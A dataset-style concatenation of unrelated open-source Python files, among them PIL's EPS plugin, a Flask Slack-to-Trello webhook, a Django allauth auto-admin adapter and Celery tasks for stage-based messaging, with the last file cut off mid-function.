| brianrock/brianrock-ringo | handlers/play.py | Python | apache-2.0 | 2,318 |
import paho.mqtt.publish as publish
import sys
from coapthon.client.helperclient import HelperClient
import vdtp
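# Illustrative invocation (argument order inferred from the assignments below):
#
#     python client_perf.py <broker_ip> <protocol>    # protocol: mqtt | coap | vdtp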
ptl = sys.argv[2]
ip_address = sys.argv[1] #broker
payload = 'Happy'
def sendCoap(client,path,payload):
response = client.post(path,payload,timeout=30)
client.stop()
print 'COAP sent'
return
if ptl == 'mqtt':
try:
publish.single('perf_test',payload,hostname=ip_address)
print 'Sent'
except:
print 'Fail'
if ptl == 'coap':
client = HelperClient(server=(ip_address, 5683))
path = 'Basic'
sendCoap(client,path,payload)
if ptl == 'vdtp':
port=5050
vdtp.send(payload,(ip_address,port),1) | aganji/vdtp | client_perf.py | Python | apache-2.0 | 619 |
#
# The Python Imaging Library.
# $Id$
#
# EPS file handling
#
# History:
# 1995-09-01 fl Created (0.1)
# 1996-05-18 fl Don't choke on "atend" fields, Ghostscript interface (0.2)
# 1996-08-22 fl Don't choke on floating point BoundingBox values
# 1996-08-23 fl Handle files from Macintosh (0.3)
# 2001-02-17 fl Use 're' instead of 'regex' (Python 2.1) (0.4)
# 2003-09-07 fl Check gs.close status (from Federico Di Gregorio) (0.5)
# 2014-05-07 e Handling of EPS with binary preview and fixed resolution
# resizing
#
# Copyright (c) 1997-2003 by Secret Labs AB.
# Copyright (c) 1995-2003 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
import re
import io
import sys
from PIL import Image, ImageFile, _binary
__version__ = "0.5"
#
# --------------------------------------------------------------------
i32 = _binary.i32le
o32 = _binary.o32le
split = re.compile(r"^%%([^:]*):[ \t]*(.*)[ \t]*$")
field = re.compile(r"^%[%!\w]([^:]*)[ \t]*$")
gs_windows_binary = None
if sys.platform.startswith('win'):
import shutil
if hasattr(shutil, 'which'):
which = shutil.which
else:
# Python < 3.3
import distutils.spawn
which = distutils.spawn.find_executable
for binary in ('gswin32c', 'gswin64c', 'gs'):
if which(binary) is not None:
gs_windows_binary = binary
break
else:
gs_windows_binary = False
def has_ghostscript():
if gs_windows_binary:
return True
if not sys.platform.startswith('win'):
import subprocess
try:
gs = subprocess.Popen(['gs', '--version'], stdout=subprocess.PIPE)
gs.stdout.read()
return True
except OSError:
# no ghostscript
pass
return False
def Ghostscript(tile, size, fp, scale=1):
"""Render an image using Ghostscript"""
# Unpack decoder tile
decoder, tile, offset, data = tile[0]
length, bbox = data
# Hack to support hi-res rendering
scale = int(scale) or 1
# orig_size = size
# orig_bbox = bbox
size = (size[0] * scale, size[1] * scale)
# resolution is dependent on bbox and size
res = (float((72.0 * size[0]) / (bbox[2]-bbox[0])),
float((72.0 * size[1]) / (bbox[3]-bbox[1])))
# print("Ghostscript", scale, size, orig_size, bbox, orig_bbox, res)
import os
import subprocess
import tempfile
out_fd, outfile = tempfile.mkstemp()
os.close(out_fd)
infile_temp = None
if hasattr(fp, 'name') and os.path.exists(fp.name):
infile = fp.name
else:
in_fd, infile_temp = tempfile.mkstemp()
os.close(in_fd)
infile = infile_temp
# ignore length and offset!
# ghostscript can read it
# copy whole file to read in ghostscript
with open(infile_temp, 'wb') as f:
# fetch length of fp
fp.seek(0, 2)
fsize = fp.tell()
# ensure start position
# go back
fp.seek(0)
lengthfile = fsize
while lengthfile > 0:
s = fp.read(min(lengthfile, 100*1024))
if not s:
break
lengthfile -= len(s)
f.write(s)
# Build ghostscript command
command = ["gs",
"-q", # quiet mode
"-g%dx%d" % size, # set output geometry (pixels)
"-r%fx%f" % res, # set input DPI (dots per inch)
"-dNOPAUSE -dSAFER", # don't pause between pages,
# safe mode
"-sDEVICE=ppmraw", # ppm driver
"-sOutputFile=%s" % outfile, # output file
"-c", "%d %d translate" % (-bbox[0], -bbox[1]),
# adjust for image origin
"-f", infile, # input file
]
if gs_windows_binary is not None:
if not gs_windows_binary:
raise WindowsError('Unable to locate Ghostscript on paths')
command[0] = gs_windows_binary
# push data through ghostscript
try:
gs = subprocess.Popen(command, stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
gs.stdin.close()
status = gs.wait()
if status:
raise IOError("gs failed (status %d)" % status)
im = Image.core.open_ppm(outfile)
finally:
try:
os.unlink(outfile)
if infile_temp:
os.unlink(infile_temp)
except:
pass
return im
class PSFile(object):
"""
Wrapper for bytesio object that treats either CR or LF as end of line.
"""
def __init__(self, fp):
self.fp = fp
self.char = None
def seek(self, offset, whence=0):
self.char = None
self.fp.seek(offset, whence)
def readline(self):
s = self.char or b""
self.char = None
c = self.fp.read(1)
while c not in b"\r\n":
s = s + c
c = self.fp.read(1)
self.char = self.fp.read(1)
# line endings can be 1 or 2 of \r \n, in either order
if self.char in b"\r\n":
self.char = None
return s.decode('latin-1')
def _accept(prefix):
return prefix[:4] == b"%!PS" or \
(len(prefix) >= 4 and i32(prefix) == 0xC6D3D0C5)
##
# Image plugin for Encapsulated Postscript. This plugin supports only
# a few variants of this format.
class EpsImageFile(ImageFile.ImageFile):
"""EPS File Parser for the Python Imaging Library"""
format = "EPS"
format_description = "Encapsulated Postscript"
mode_map = {1: "L", 2: "LAB", 3: "RGB"}
def _open(self):
(length, offset) = self._find_offset(self.fp)
# Rewrap the open file pointer in something that will
# convert line endings and decode to latin-1.
try:
if bytes is str:
# Python2, no encoding conversion necessary
fp = open(self.fp.name, "Ur")
else:
# Python3, can use bare open command.
fp = open(self.fp.name, "Ur", encoding='latin-1')
except:
# Expect this for bytesio/stringio
fp = PSFile(self.fp)
# go to offset - start of "%!PS"
fp.seek(offset)
box = None
self.mode = "RGB"
self.size = 1, 1 # FIXME: huh?
#
# Load EPS header
s = fp.readline().strip('\r\n')
while s:
if len(s) > 255:
raise SyntaxError("not an EPS file")
try:
m = split.match(s)
except re.error as v:
raise SyntaxError("not an EPS file")
if m:
k, v = m.group(1, 2)
self.info[k] = v
if k == "BoundingBox":
try:
# Note: The DSC spec says that BoundingBox
# fields should be integers, but some drivers
# put floating point values there anyway.
box = [int(float(i)) for i in v.split()]
self.size = box[2] - box[0], box[3] - box[1]
self.tile = [("eps", (0, 0) + self.size, offset,
(length, box))]
except:
pass
else:
m = field.match(s)
if m:
k = m.group(1)
if k == "EndComments":
break
if k[:8] == "PS-Adobe":
self.info[k[:8]] = k[9:]
else:
self.info[k] = ""
elif s[0] == '%':
# handle non-DSC Postscript comments that some
# tools mistakenly put in the Comments section
pass
else:
raise IOError("bad EPS header")
s = fp.readline().strip('\r\n')
if s[:1] != "%":
break
#
# Scan for an "ImageData" descriptor
while s[:1] == "%":
if len(s) > 255:
raise SyntaxError("not an EPS file")
if s[:11] == "%ImageData:":
# Encoded bitmapped image.
x, y, bi, mo = s[11:].split(None, 7)[:4]
if int(bi) != 8:
break
try:
self.mode = self.mode_map[int(mo)]
except:
break
self.size = int(x), int(y)
return
s = fp.readline().strip('\r\n')
if not s:
break
if not box:
raise IOError("cannot determine EPS bounding box")
def _find_offset(self, fp):
s = fp.read(160)
if s[:4] == b"%!PS":
# for HEAD without binary preview
fp.seek(0, 2)
length = fp.tell()
offset = 0
elif i32(s[0:4]) == 0xC6D3D0C5:
# FIX for: Some EPS file not handled correctly / issue #302
# EPS can contain binary data
# or start directly with latin coding
# more info see:
# http://partners.adobe.com/public/developer/en/ps/5002.EPSF_Spec.pdf
offset = i32(s[4:8])
length = i32(s[8:12])
else:
raise SyntaxError("not an EPS file")
return (length, offset)
def load(self, scale=1):
# Load EPS via Ghostscript
if not self.tile:
return
self.im = Ghostscript(self.tile, self.size, self.fp, scale)
self.mode = self.im.mode
self.size = self.im.size
self.tile = []
def load_seek(self, *args, **kwargs):
# we can't incrementally load, so force ImageFile.parser to
# use our custom load method by defining this method.
pass
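# Usage sketch (hypothetical file names; requires a Ghostscript binary on the
# search path): opening an EPS only parses the header, and pixel data is
# rasterized through Ghostscript on load().
#   im = Image.open("figure.eps")   # header only: size, mode, bounding box
#   im.load(scale=2)                # rasterize at 2x resolution
#   im.save("figure.png")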
#
# --------------------------------------------------------------------
def _save(im, fp, filename, eps=1):
"""EPS Writer for the Python Imaging Library."""
#
# make sure image data is available
im.load()
#
# determine postscript image mode
if im.mode == "L":
operator = (8, 1, "image")
elif im.mode == "RGB":
operator = (8, 3, "false 3 colorimage")
elif im.mode == "CMYK":
operator = (8, 4, "false 4 colorimage")
else:
raise ValueError("image mode is not supported")
class NoCloseStream(object):
def __init__(self, fp):
self.fp = fp
def __getattr__(self, name):
return getattr(self.fp, name)
def close(self):
pass
base_fp = fp
if fp != sys.stdout:
fp = NoCloseStream(fp)
if sys.version_info[0] > 2:
fp = io.TextIOWrapper(fp, encoding='latin-1')
if eps:
#
# write EPS header
fp.write("%!PS-Adobe-3.0 EPSF-3.0\n")
fp.write("%%Creator: PIL 0.1 EpsEncode\n")
# fp.write("%%CreationDate: %s"...)
fp.write("%%%%BoundingBox: 0 0 %d %d\n" % im.size)
fp.write("%%Pages: 1\n")
fp.write("%%EndComments\n")
fp.write("%%Page: 1 1\n")
fp.write("%%ImageData: %d %d " % im.size)
fp.write("%d %d 0 1 1 \"%s\"\n" % operator)
#
# image header
fp.write("gsave\n")
fp.write("10 dict begin\n")
fp.write("/buf %d string def\n" % (im.size[0] * operator[1]))
fp.write("%d %d scale\n" % im.size)
fp.write("%d %d 8\n" % im.size) # <= bits
fp.write("[%d 0 0 -%d 0 %d]\n" % (im.size[0], im.size[1], im.size[1]))
fp.write("{ currentfile buf readhexstring pop } bind\n")
fp.write(operator[2] + "\n")
if hasattr(fp, "flush"):
fp.flush()
ImageFile._save(im, base_fp, [("eps", (0, 0)+im.size, 0, None)])
fp.write("\n%%%%EndBinary\n")
fp.write("grestore end\n")
if hasattr(fp, "flush"):
fp.flush()
#
# --------------------------------------------------------------------
Image.register_open(EpsImageFile.format, EpsImageFile, _accept)
Image.register_save(EpsImageFile.format, _save)
Image.register_extension(EpsImageFile.format, ".ps")
Image.register_extension(EpsImageFile.format, ".eps")
Image.register_mime(EpsImageFile.format, "application/postscript")
| FreddieShoreditch/image_folder_organiser | venv/lib/python2.7/site-packages/PIL/EpsImagePlugin.py | Python | mit | 12,539 |
# Load in our dependencies
import os
from flask import Flask, request
from slack_to_trello.model import SLACK_TOKEN, make_trello_card, send_slack_message
# Start up a server
app = Flask(__name__)
# Set up our endpoints
@app.route('/')
def root():
"""Reply to curious persons"""
return 'slack-to-trello made by Underdog.io with love <3'
@app.route('/slack/message', methods=['POST'])
def slack_message():
"""When we receive a message from Slack, generate a Trello card and reply"""
# Incoming request format:
# token=TOKEN
# team_id=T0001
# team_domain=example
# channel_id=C12345
# channel_name=test
# user_id=U12345
# user_name=Steve
# command=/weather
# text=94070
# Verify Slack token lines up
if request.form['token'] != SLACK_TOKEN:
return ('Provided Slack token from message didn\'t match our server\'s Slack token. '
'Please double check they are aligned', 403)
# Extract our text and make a card
text = request.form['text']
user_name = request.form['user_name']
# Pre-emptively extract channel name before taking actions (transaction-esque)
channel_name = request.form['channel_name']
card = make_trello_card(name='{text} ({user_name})'.format(text=text, user_name=user_name))
# Send a message to Slack about our success
# TODO: Escape our content
send_slack_message(channel='#{channel_name}'.format(channel_name=channel_name),
text='Trello card "<{url}|{text}>" created by "{user_name}"'
.format(url=card.url, text=text, user_name=user_name))
# Reply with nothing (as the external message does more)
return ''
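# Local test sketch (field values are hypothetical): simulate Slack's
# slash-command POST with Flask's test client. Note this exercises the real
# Trello and Slack clients unless they are stubbed out.
#   client = app.test_client()
#   client.post('/slack/message', data={'token': SLACK_TOKEN,
#               'text': 'Buy milk', 'user_name': 'Steve',
#               'channel_name': 'test'})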
# If this is a direct invocation, start our server
if __name__ == '__main__':
    port = int(os.environ.get('PORT', 5000))
env = os.environ.get('ENV', 'development')
app.debug = env != 'production'
app.run(port=port)
| underdogio/slack-to-trello | slack_to_trello/__init__.py | Python | mit | 1,930 |
import os
import channels.asgi
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "jobhuntr.settings")
channel_layer = channels.asgi.get_channel_layer()
| timkofu/jobhuntr | jobhuntr/asgi.py | Python | mit | 151 |
#!/usr/bin/python
#
# \file directories.py
# \brief Directories configuration
# \date 2010-08-27 17:13GMT
# \author Jan Boon (Kaetemi)
# \date 2001-2005
# \author Nevrax
# Python port of game data build pipeline.
# Directories configuration.
#
# NeL - MMORPG Framework <http://dev.ryzom.com/projects/nel/>
# Copyright (C) 2010 Winch Gate Property Limited
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# *** COMMON NAMES AND PATHS ***
EcosystemName = "characters_maps_hr"
EcosystemPath = "common/" + EcosystemName
ContinentName = EcosystemName
ContinentPath = EcosystemPath
CommonName = ContinentName
CommonPath = ContinentPath
# *** SOURCE DIRECTORIES IN THE DATABASE ***
# Maps directories
MapSourceDirectories = [ ]
MapSourceDirectories += [ "stuff/caravan/agents/_textures/actors" ]
MapSourceDirectories += [ "stuff/caravan/agents/_textures/actors/visages" ]
MapUncompressedSourceDirectories = [ ]
MapPanoplySourceDirectories = [ ]
MapPanoplySourceDirectories += [ [ "panoply_common.cfg" ] + [ "panoply_matis.cfg" ] + [ "stuff/matis/agents/_textures/actors" ] + [ "stuff/matis/agents/_textures/actors/mask" ] ]
MapPanoplySourceDirectories += [ [ "panoply_common.cfg" ] + [ "panoply_tryker.cfg" ] + [ "stuff/tryker/agents/_textures/actors" ] + [ "stuff/tryker/agents/_textures/actors/mask" ] ]
MapPanoplySourceDirectories += [ [ "panoply_common.cfg" ] + [ "panoply_fyros.cfg" ] + [ "stuff/fyros/agents/_textures/actors" ] + [ "stuff/fyros/agents/_textures/actors/mask" ] ]
MapPanoplySourceDirectories += [ [ "panoply_common.cfg" ] + [ "panoply_zorai.cfg" ] + [ "stuff/zorai/agents/_textures/actors" ] + [ "stuff/zorai/agents/_textures/actors/mask" ] ]
MapPanoplySourceDirectories += [ [ "panoply_common.cfg" ] + [ "panoply_generique.cfg" ] + [ "stuff/generique/agents/_textures/actors" ] + [ "stuff/generique/agents/_textures/actors/mask" ] ]
# *** EXPORT DIRECTORIES FOR THE BUILD PIPELINE ***
# Map directories
MapExportDirectory = CommonPath + "/map_export"
MapUncompressedExportDirectory = CommonPath + "/map_uncompressed"
# *** BUILD DIRECTORIES FOR THE BUILD PIPELINE ***
# Map directories
MapBuildDirectory = CommonPath + "/map"
MapPanoplyBuildDirectory = CommonPath + "/map_panoply"
MapPanoplyHlsInfoBuildDirectory = CommonPath + "/map_panoply_hls_info"
MapPanoplyHlsBankBuildDirectory = CommonPath + "/map_panoply_hls_bank"
MapPanoplyCacheBuildDirectory = CommonPath + "/map_panoply_cache"
MapTagBuildDirectory = CommonPath + "/map_tag"
# *** INSTALL DIRECTORIES IN THE CLIENT DATA ***
# Map directory
MapInstallDirectory = CommonName
BitmapInstallDirectory = MapInstallDirectory
| osgcc/ryzom | ryzom/tools/build_gamedata/workspace/common/characters_maps_hr/directories.py | Python | agpl-3.0 | 3,224 |
"""
Authentication adapters for Allauth
"""
try:
from allauth.account.adapter import DefaultAccountAdapter
except ImportError:
print('ERROR: This authentication adapter requires django-allauth.')
raise
from django.conf import settings
from django.contrib import messages
from django.utils.translation import ugettext_lazy as _
ADMIN_EMAIL_ADDRESSES = [email for name, email in settings.ADMINS]
class AutoadminAccountAdapter(DefaultAccountAdapter):
"""
Allauth account adapter that enables automatic grant of admin permissions
to users signing up having their email address listed in the ``ADMINS``
Django settings. Django settings needed to activate this feature:
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.sites',
'allauth',
'allauth.account',
'allauth.socialaccount',
]
ACCOUNT_ADAPTER = 'autoadmin.auth.allauth.AutoadminAccountAdapter'
See also:
- http://django-allauth.readthedocs.io/en/latest/configuration.html
- http://django-allauth.readthedocs.io/en/latest/advanced.html#admin
"""
def confirm_email(self, request, email_address):
"""
Give superuser privileges automagically if the email address of a
user confirming their email is listed in ``settings.ADMINS``.
"""
super(AutoadminAccountAdapter,
self).confirm_email(request, email_address)
if email_address.email in ADMIN_EMAIL_ADDRESSES:
user = email_address.user
user.is_staff = user.is_superuser = True
user.save()
messages.add_message(
request, messages.INFO,
_('Welcome Admin! You have been given superuser privileges. '
'Use them with caution.')
)
| rosarior/django-autoadmin | autoadmin/auth/allauth.py | Python | mit | 1,844 |
import os
import matplotlib.pyplot as plt
import tensorblock as tb
### Plot Initialize
def initialize( shape ):
plt.figure( figsize = ( 12 , 9 ) )
### Plot Reconstruction
def reconst( x1 , x2 ,
epoch = 0 , dir = 'figures' , shape = None ):
if len( x1.shape ) == 2:
s = tb.aux.side2D( x1.shape[1] ) ; x1 = x1.reshape( [ -1 , s , s , 1 ] )
if len( x2.shape ) == 2:
s = tb.aux.side2D( x2.shape[1] ) ; x2 = x2.reshape( [ -1 , s , s , 1 ] )
r , c = shape ; k = 0
for j in range( r ):
for i in range( c ):
plt.subplot( 2 * r , c , i + 2 * j * c + 1 )
plt.imshow( x1[ k , : , : , 0 ] , vmin = 0 , vmax = 1 )
plt.axis( 'off' )
plt.subplot( 2 * r , c , i + 2 * j * c + c + 1 )
plt.imshow( x2[ k , : , : , 0 ] , vmin = 0 , vmax = 1 )
plt.axis( 'off' )
k = k + 1
if not os.path.exists( dir ): os.makedirs( dir )
plt.savefig( dir + '/epoch%d.png' % epoch , bbox_inches = 'tight' )
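# Usage sketch (illustrative shapes): plot an r-by-c grid of input /
# reconstruction pairs; flattened square images are reshaped automatically.
#   initialize( ( 4 , 8 ) )
#   reconst( x_batch , x_reconstructed , epoch = 10 , shape = ( 4 , 8 ) )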
| NiloFreitas/Deep-Reinforcement-Learning | tensorblock/functions/func_plotters.py | Python | mit | 1,085 |
import os
from setuptools import setup, find_packages
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
from gtm import __version__
setup(
name = "django-google-tag-manager",
version = __version__,
author = "Tomas Neme",
author_email = "[email protected]",
description = ("Easily include your Google Tag Manager tag in your "
"django site"),
license = "MIT",
keywords = "django generic-views",
url = "https://github.com/Lacrymology/django-google-tag-manager",
packages=find_packages(),
include_package_data=True,
long_description=read('README.md'),
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"License :: OSI Approved :: MIT License",
],
)
| Lacrymology/django-google-tag-manager | setup.py | Python | mit | 1,031 |
try:
from urlparse import urlunparse
except ImportError:
from urllib.parse import urlunparse
from datetime import timedelta
from functools import partial
from celery.exceptions import SoftTimeLimitExceeded
from celery.task import Task
from celery.utils.log import get_task_logger
from demands import HTTPServiceError
from django.conf import settings
from django.contrib.sites.shortcuts import get_current_site
from django.core import serializers
from django.core.cache import caches
from django.core.exceptions import ObjectDoesNotExist
from django.db import transaction
from django.db.models import Count, F, Q
from django.utils.timezone import now
from requests.exceptions import ConnectionError, HTTPError, Timeout
from seed_services_client import MessageSenderApiClient, SchedulerApiClient
from seed_services_client.metrics import MetricsApiClient
from contentstore.models import Message, Schedule
from seed_stage_based_messaging import utils
from seed_stage_based_messaging.celery import app
from .models import (
BehindSubscription,
EstimatedSend,
ResendRequest,
Subscription,
SubscriptionSendFailure,
)
logger = get_task_logger(__name__)
locmem_cache = caches["locmem"]
redis_cache = caches["redis"]
def get_metric_client(session=None):
return MetricsApiClient(
url=settings.METRICS_URL, auth=settings.METRICS_AUTH, session=session
)
def make_absolute_url(path):
# NOTE: We're using the default site as set by
# settings.SITE_ID and the Sites framework
site = get_current_site(None)
return urlunparse(
("https" if settings.USE_SSL else "http", site.domain, path, "", "", "")
)
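# e.g. make_absolute_url('/media/voice.ogg') -> 'https://example.com/media/voice.ogg'
# (scheme follows settings.USE_SSL; the domain comes from the default Site;
# 'example.com' here is illustrative)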
class FireMetric(Task):
""" Fires a metric using the MetricsApiClient
"""
name = "subscriptions.tasks.fire_metric"
def run(self, metric_name, metric_value, session=None, **kwargs):
metric_value = float(metric_value)
metric = {metric_name: metric_value}
metric_client = get_metric_client(session=session)
metric_client.fire_metrics(**metric)
return "Fired metric <%s> with value <%s>" % (metric_name, metric_value)
fire_metric = FireMetric()
class StoreResendRequest(Task):
"""
Task to save resend request and trigger send last message to the user.
"""
name = "subscriptions.tasks.store_resend_request"
def run(self, subscription_id, **kwargs):
resend_request = ResendRequest.objects.create(subscription_id=subscription_id)
send_current_message.delay(subscription_id, resend_request.id)
return "Message queued for resend, subscriber: {}".format(subscription_id)
store_resend_request = StoreResendRequest()
class BaseSendMessage(Task):
"""
Base Task for sending messages
"""
class FailedEventRequest(Exception):
"""
The attempted task failed because of a non-200 HTTP return
code.
"""
def on_failure(self, exc, task_id, args, kwargs, einfo):
# This function only gets called once all retries have failed, not with
# each retry, this was tested in real life and is tested on a Celery
# level but doesn't work with unit tests when CELERY_ALWAYS_EAGER is
# True.
# The function is called directly in the unit tests to make sure this
# functionality works
if isinstance(args[0], dict):
subscription_id = args[0]["subscription_id"]
else:
subscription_id = args[0]
SubscriptionSendFailure.objects.create(
subscription_id=subscription_id,
initiated_at=self.request.eta or now(),
reason=str(exc),
task_id=task_id,
)
super(BaseSendMessage, self).on_failure(exc, task_id, args, kwargs, einfo)
@app.task(
retry_backoff=True,
retry_jitter=True,
max_retries=15,
acks_late=True,
soft_time_limit=10,
time_limit=15,
base=BaseSendMessage,
bind=True,
)
def pre_send_process(self, subscription_id, resend_id=None):
logger.debug("Locking subscription")
key = "subscription_lock:{}".format(subscription_id)
locked = not redis_cache.add(
key,
now() + timedelta(seconds=settings.SUBSCRIPTION_LOCK_TIMEOUT),
timeout=settings.SUBSCRIPTION_LOCK_TIMEOUT,
)
if locked:
retry_timestamp = redis_cache.get(key)
logger.debug("Subscription locked, retrying at {}".format(retry_timestamp))
self.retry(eta=retry_timestamp)
context = {}
if resend_id:
context["resend_id"] = resend_id
logger.info("Loading Subscription")
subscription = Subscription.objects.select_related("messageset").get(
id=subscription_id
)
if not subscription.is_ready_for_processing:
if subscription.process_status == 2 or subscription.completed is True:
# Subscription is complete
logger.info("Subscription has completed")
context["error"] = "Subscription has completed"
else:
logger.info("Message sending aborted - broken or inactive")
# TODO: be more specific about why it aborted
context["error"] = (
"Message sending aborted, status <%s>" % subscription.process_status
)
return context
context.update(
{
"subscription": serializers.serialize("json", [subscription]),
"messageset": serializers.serialize("json", [subscription.messageset]),
}
)
try:
logger.info("Loading Message")
next_sequence_number = subscription.next_sequence_number
if next_sequence_number > 1 and resend_id:
next_sequence_number -= 1
message = locmem_cache.get_or_set(
"message:{}:{}:{}".format(
subscription.messageset_id, next_sequence_number, subscription.lang
),
partial(
Message.objects.get,
messageset=subscription.messageset,
sequence_number=next_sequence_number,
lang=subscription.lang,
),
)
context["message"] = serializers.serialize("json", [message])
except ObjectDoesNotExist:
error = (
"Missing Message: MessageSet: <%s>, Sequence Number: <%s>" ", Lang: <%s>"
) % (
subscription.messageset,
subscription.next_sequence_number,
subscription.lang,
)
logger.error(error, exc_info=True)
context["error"] = "Message sending aborted, missing message"
return context
return context
@app.task(
autoretry_for=(
HTTPError,
ConnectionError,
Timeout,
HTTPServiceError,
SoftTimeLimitExceeded,
),
retry_backoff=True,
retry_jitter=True,
max_retries=15,
acks_late=True,
soft_time_limit=10,
time_limit=15,
base=BaseSendMessage,
)
def get_identity_address(context):
if "error" in context:
return context
[deserialized_subscription] = serializers.deserialize(
"json", context["subscription"]
)
subscription = deserialized_subscription.object
to_addr = utils.get_identity_address(
subscription.identity, use_communicate_through=True
)
if to_addr is None:
logger.info("No valid recipient to_addr found")
subscription.process_status = -1
deserialized_subscription.save(update_fields=("process_status",))
context["error"] = "Valid recipient could not be found"
else:
context["to_addr"] = to_addr
return context
@app.task(
autoretry_for=(
HTTPError,
ConnectionError,
Timeout,
HTTPServiceError,
SoftTimeLimitExceeded,
),
retry_backoff=True,
retry_jitter=True,
max_retries=15,
acks_late=True,
soft_time_limit=10,
time_limit=15,
base=BaseSendMessage,
)
def send_message(context):
if "error" in context:
return context
[deserialized_subscription] = serializers.deserialize(
"json", context["subscription"]
)
subscription = deserialized_subscription.object
[messageset] = serializers.deserialize("json", context["messageset"])
messageset = messageset.object
[message] = serializers.deserialize("json", context["message"])
message = message.object
payload = {
"to_addr": context["to_addr"],
"to_identity": subscription.identity,
"delivered": "false",
"resend": "true" if "resend_id" in context else "false",
"metadata": message.metadata,
}
if messageset.channel:
payload["channel"] = messageset.channel
prepend_next = (subscription.metadata or {}).get("prepend_next_delivery", None)
if messageset.content_type == "text":
logger.debug("Determining payload content")
if prepend_next:
logger.debug("Prepending next delivery")
payload["content"] = "%s\n%s" % (prepend_next, message.text_content)
else:
logger.debug("Loading default content")
payload["content"] = message.text_content
if message.binary_content:
payload["metadata"]["image_url"] = make_absolute_url(
message.binary_content.content.url
)
logger.debug("text content loaded")
else:
if prepend_next:
payload["metadata"]["voice_speech_url"] = [
prepend_next,
make_absolute_url(message.binary_content.content.url),
]
else:
payload["metadata"]["voice_speech_url"] = [
make_absolute_url(message.binary_content.content.url)
]
if messageset.id in settings.DRY_RUN_MESSAGESETS:
logger.info("Skipping sending of message")
else:
logger.info("Sending message to Message Sender")
message_sender_client = MessageSenderApiClient(
settings.MESSAGE_SENDER_TOKEN,
settings.MESSAGE_SENDER_URL,
retries=5,
timeout=settings.DEFAULT_REQUEST_TIMEOUT,
)
result = message_sender_client.create_outbound(payload)
context["outbound_id"] = result["id"]
if prepend_next:
logger.debug("Clearing prepended message")
subscription.metadata["prepend_next_delivery"] = None
deserialized_subscription.save(update_fields=("metadata",))
context["subscription"] = serializers.serialize("json", [subscription])
logger.debug("Message queued for send. ID: <%s>" % str(context.get("outbound_id")))
return context
@app.task(
retry_backoff=True,
retry_jitter=True,
max_retries=15,
acks_late=True,
soft_time_limit=10,
time_limit=15,
base=BaseSendMessage,
)
def post_send_process(context):
"""
Task to ensure subscription is bumped or converted
"""
if "error" in context:
return context
[deserialized_subscription] = serializers.deserialize(
"json", context["subscription"]
)
subscription = deserialized_subscription.object
[messageset] = serializers.deserialize("json", context["messageset"])
messageset = messageset.object
# Get set max
set_max = locmem_cache.get_or_set(
"messageset_size:{}:{}".format(messageset.id, subscription.lang),
messageset.messages.filter(lang=subscription.lang).count,
)
logger.debug("set_max calculated - %s" % set_max)
# Compare user position to max
if subscription.next_sequence_number == set_max:
with transaction.atomic():
# Mark current as completed
logger.debug("marking current subscription as complete")
subscription.completed = True
subscription.active = False
subscription.process_status = 2 # Completed
subscription.updated_at = now()
deserialized_subscription.save(
update_fields=("completed", "active", "process_status", "updated_at")
)
# If next set defined create new subscription
if messageset.next_set:
logger.info("Creating new subscription for next set")
newsub = Subscription.objects.create(
identity=subscription.identity,
lang=subscription.lang,
messageset=messageset.next_set,
schedule=messageset.next_set.default_schedule,
)
logger.debug("Created Subscription <%s>" % newsub.id)
else:
# More in this set so increment by one
logger.debug("incrementing next_sequence_number")
subscription.next_sequence_number = F("next_sequence_number") + 1
subscription.updated_at = now()
logger.debug("saving subscription")
deserialized_subscription.save(
update_fields=("next_sequence_number", "updated_at")
)
logger.debug("unlocking the subscription")
redis_cache.delete("subscription_lock:{}".format(subscription.id))
# return response
return "Subscription for %s updated" % str(subscription.id)
@app.task(
retry_backoff=True,
retry_jitter=True,
max_retries=15,
acks_late=True,
soft_time_limit=10,
time_limit=15,
base=BaseSendMessage,
)
def post_send_process_resend(context):
[message] = serializers.deserialize("json", context["message"])
message = message.object
[deserialized_subscription] = serializers.deserialize(
"json", context["subscription"]
)
subscription = deserialized_subscription.object
resend_request = ResendRequest.objects.get(id=context["resend_id"])
with transaction.atomic():
if "outbound_id" in context:
resend_request.outbound = context["outbound_id"]
resend_request.message_id = message.id
resend_request.save(update_fields=("outbound", "message_id"))
subscription.process_status = 0
subscription.updated_at = now()
deserialized_subscription.save(update_fields=("process_status", "updated_at"))
send_next_message = (
pre_send_process.s()
| get_identity_address.s()
| send_message.s()
| post_send_process.s()
)
send_current_message = (
pre_send_process.s()
| get_identity_address.s()
| send_message.s()
| post_send_process_resend.s()
)
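# Usage sketch: both chains are kicked off with a single subscription id,
# e.g. send_next_message.delay(str(subscription.id)); each task passes its
# context dict on to the next link in the chain.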
class ScheduleDisable(Task):
""" Task to disable a subscription's schedule
"""
name = "subscriptions.tasks.schedule_disable"
def scheduler_client(self):
return SchedulerApiClient(settings.SCHEDULER_API_TOKEN, settings.SCHEDULER_URL)
def run(self, subscription_id, **kwargs):
log = self.get_logger(**kwargs)
log.info("Disabling schedule for <%s>" % (subscription_id,))
try:
subscription = Subscription.objects.get(id=subscription_id)
try:
schedule_id = subscription.metadata["scheduler_schedule_id"]
scheduler = self.scheduler_client()
scheduler.update_schedule(
subscription.metadata["scheduler_schedule_id"], {"enabled": False}
)
log.info(
"Disabled schedule <%s> on scheduler for sub <%s>"
% (schedule_id, subscription_id)
)
return True
except Exception:
log.info("Schedule id not saved in subscription metadata")
return False
except ObjectDoesNotExist:
logger.error("Missing Subscription", exc_info=True)
except SoftTimeLimitExceeded:
logger.error(
"Soft time limit exceed processing schedule create " "via Celery.",
exc_info=True,
)
return False
schedule_disable = ScheduleDisable()
class ScheduledMetrics(Task):
""" Fires off tasks for all the metrics that should run
on a schedule
"""
name = "subscriptions.tasks.scheduled_metrics"
def run(self, **kwargs):
